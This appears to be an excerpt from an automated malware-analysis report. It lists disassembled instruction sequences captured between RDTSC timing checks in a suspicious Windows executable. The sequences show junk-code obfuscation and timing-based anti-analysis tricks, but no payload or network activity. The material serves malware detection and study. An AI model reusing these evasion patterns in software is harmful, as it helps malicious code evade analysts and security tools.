Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2B87F second address: C2B8FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F1CC8B8C9F0h 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1CC8B8C9E8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B37h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F1CC8B8C9E8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 js 00007F1CC8B8C9E6h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2C9A0 second address: C2CA2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C42h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3A42h], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F1CC8BB7C38h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 and ebx, 6F7B1297h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F1CC8BB7C38h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jmp 00007F1CC8BB7C3Fh 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a je 00007F1CC8BB7C38h 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2CA2C second address: C2CA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2CA32 second address: C2CA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2D9C4 second address: C2DA2D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, 44ACh 0x00000012 push 00000000h 0x00000014 jmp 00007F1CC8B8C9EAh 0x00000019 pushad 0x0000001a mov ebx, dword ptr [ebp+122D29F7h] 0x00000020 add esi, dword ptr [ebp+122D1A67h] 0x00000026 popad 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F1CC8B8C9E8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 jno 00007F1CC8B8C9ECh 0x00000049 push eax 0x0000004a jbe 00007F1CC8B8C9F4h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2E90D second address: C2E990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F1CC8BB7C44h 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push esi 0x0000000f jmp 00007F1CC8BB7C3Eh 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 nop 0x00000017 jmp 00007F1CC8BB7C40h 0x0000001c movzx ebx, di 0x0000001f push 00000000h 0x00000021 jmp 00007F1CC8BB7C3Ah 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F1CC8BB7C38h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 or dword ptr [ebp+122D20A5h], eax 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jg 00007F1CC8BB7C36h 0x00000052 jo 00007F1CC8BB7C36h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2E990 second address: C2E9A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F1CC8B8C9E8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2DB72 second address: C2DB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2DB78 second address: C2DB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2DB7C second address: C2DC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CC8BB7C3Ch 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1CC8BB7C38h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 085D56DBh 0x0000002e push dword ptr fs:[00000000h] 0x00000035 jns 00007F1CC8BB7C38h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov edi, dword ptr [ebp+122D28DFh] 0x00000048 mov eax, dword ptr [ebp+122D0895h] 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F1CC8BB7C38h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 or di, C547h 0x0000006d push FFFFFFFFh 0x0000006f jg 00007F1CC8BB7C41h 0x00000075 jmp 00007F1CC8BB7C3Bh 0x0000007a push eax 0x0000007b pushad 0x0000007c jmp 00007F1CC8BB7C43h 0x00000081 push esi 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C30AE9 second address: C30B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1CC8B8C9F0h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F1CC8B8C9F5h 0x00000016 jne 00007F1CC8B8C9F8h 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F1CC8B8C9E8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D18B2h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop edi 0x00000044 push 00000000h 0x00000046 add dword ptr [ebp+122D1F25h], esi 0x0000004c push eax 0x0000004d js 00007F1CC8B8C9F0h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2FB5F second address: C2FB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2FB63 second address: C2FB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C30D3D second address: C30D47 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C32AEE second address: C32B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jng 00007F1CC8B8C9F2h 0x0000000d jns 00007F1CC8B8C9ECh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F1CC8B8C9E8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F1CC8B8C9E8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jg 00007F1CC8B8C9ECh 0x00000050 stc 0x00000051 sub dword ptr [ebp+122D1E8Bh], eax 0x00000057 push 00000000h 0x00000059 mov edi, dword ptr [ebp+122D3A42h] 0x0000005f xchg eax, esi 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F1CC8B8C9F3h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C32B85 second address: C32BCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1CC8BB7C48h 0x00000010 jmp 00007F1CC8BB7C41h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F1CC8BB7C3Bh 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34B76 second address: C34B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34B7A second address: C34BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1CC8BB7C46h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34BA0 second address: C34BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1CC8B8C9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34BAA second address: C34BD1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F1CC8BB7C38h 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F1CC8BB7C3Eh 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C32DB3 second address: C32DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34BD1 second address: C34BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C3BC03 second address: C3BC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C469EA second address: C469EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C469EE second address: C46A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C46B79 second address: C46B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Fh 0x00000009 jl 00007F1CC8BB7C36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4712A second address: C4714D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4A76D second address: C4A788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C42h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F680 second address: C1F685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F685 second address: C1F6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F1CC8BB7C38h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+124843F7h] 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F1CC8BB7C38h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a js 00007F1CC8BB7C36h 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F6E8 second address: C1F6F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F6F6 second address: C1F704 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FCCB second address: C1FCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FCD1 second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cl, ah 0x0000000d push dword ptr [ebp+122D1585h] 0x00000013 mov edx, 23EF1354h 0x00000018 call dword ptr [ebp+122D1BDCh] 0x0000001e pushad 0x0000001f jc 00007F1CC8BB7C37h 0x00000025 clc 0x00000026 xor eax, eax 0x00000028 cmc 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d sub dword ptr [ebp+122D1E72h], edx 0x00000033 mov dword ptr [ebp+122D2B3Bh], eax 0x00000039 mov dword ptr [ebp+122D1E72h], edx 0x0000003f mov dword ptr [ebp+122D2EACh], ebx 0x00000045 mov esi, 0000003Ch 0x0000004a jmp 00007F1CC8BB7C49h 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jmp 00007F1CC8BB7C44h 0x00000058 stc 0x00000059 lodsw 0x0000005b mov dword ptr [ebp+122D2EACh], edi 0x00000061 sub dword ptr [ebp+122D1E72h], ecx 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b jl 00007F1CC8BB7C37h 0x00000071 clc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 jp 00007F1CC8BB7C3Ch 0x0000007d mov dword ptr [ebp+122D2E13h], edx 0x00000083 nop 0x00000084 push eax 0x00000085 push edx 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 pop edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FD6D second address: C1FDDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F1CC8B8C9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F1CC8B8C9EEh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jne 00007F1CC8B8C9F2h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1CC8B8C9E6h 0x00000027 jnp 00007F1CC8B8C9E6h 0x0000002d popad 0x0000002e jbe 00007F1CC8B8C9E8h 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b jmp 00007F1CC8B8C9F0h 0x00000040 pop eax 0x00000041 or dword ptr [ebp+122D201Ch], eax 0x00000047 push 619CFFC9h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FDDD second address: C1FDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FDE1 second address: C1FDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FDEB second address: C1FDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FEB5 second address: C1FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FF67 second address: C1FF9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F1CC8BB7C4Bh 0x00000013 jmp 00007F1CC8BB7C45h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2021B second address: C2021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2021F second address: C20225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20225 second address: C2022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2022B second address: C2022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2022F second address: C2027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000004h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F1CC8B8C9E8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push edi 0x00000026 call 00007F1CC8B8C9F4h 0x0000002b sbb dx, 4E8Fh 0x00000030 pop edx 0x00000031 pop edx 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2027D second address: C20281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20281 second address: C20287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20AC9 second address: C20AD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20AD3 second address: C20AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAA2 second address: C4AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F1CC8BB7C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAAC second address: C4AAEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007F1CC8B8C9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F1CC8B8C9EEh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jc 00007F1CC8B8C9E6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1CC8B8C9F4h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1CC8B8C9ECh 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAEE second address: C4AAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAF2 second address: C4AAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AF4A second address: C4AF64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1CC8BB7C40h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4B544 second address: C4B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C50FF5 second address: C50FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C50FF9 second address: C5103C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1CC8B8C9F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F1CC8B8C9F2h 0x00000011 pushad 0x00000012 jp 00007F1CC8B8C9EEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5103C second address: C5104B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CC8BB7C36h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5104B second address: C5104F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FDCA second address: C4FDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FF5E second address: C4FF63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FACD second address: C4FAD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
